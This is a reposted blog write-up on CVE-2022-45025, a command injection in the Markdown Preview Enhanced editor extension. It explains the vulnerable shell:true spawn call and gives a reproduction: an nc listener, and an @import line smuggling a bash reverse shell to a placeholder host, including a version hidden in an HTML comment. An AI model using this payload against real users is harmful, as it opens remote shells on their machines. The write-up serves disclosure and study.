CVE-2022-45025: reproducing the Markdown Preview Enhanced plugin preview vulnerability
Root cause
The vulnerable code snippet is as follows:
const task = spawn(
  "pdf2svg",
  [
    `"${pdfFilePath}"`,   // taken from the document's @import path without validation
    `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
    "all",
  ],
  { shell: true },        // the whole argument list is joined into one command line and parsed by the shell
)
pdfFilePath is not validated here, and at the same time {shell: true} is set, so the imported file name ends up on a shell command line. That combination is the exploitable point.
Reproduction
On a VPS, start a listener with nc:
nc -lvvp yourport
In a local Kali virtual machine, install VS Code and the Markdown Preview Enhanced extension (VSCode, Atom).
Create a new markdown file and enter the payload:
@import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf"
The following comment will be recognised by MPE as a valid "@import" command:
<!-- @import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" -->
Press Ctrl+K V to open the preview; the reverse shell connects back successfully.
This article is from cnblogs, author: sherlson. When reposting, please cite the original link: https://www.cnblogs.com/sherlson/articles/16987056.html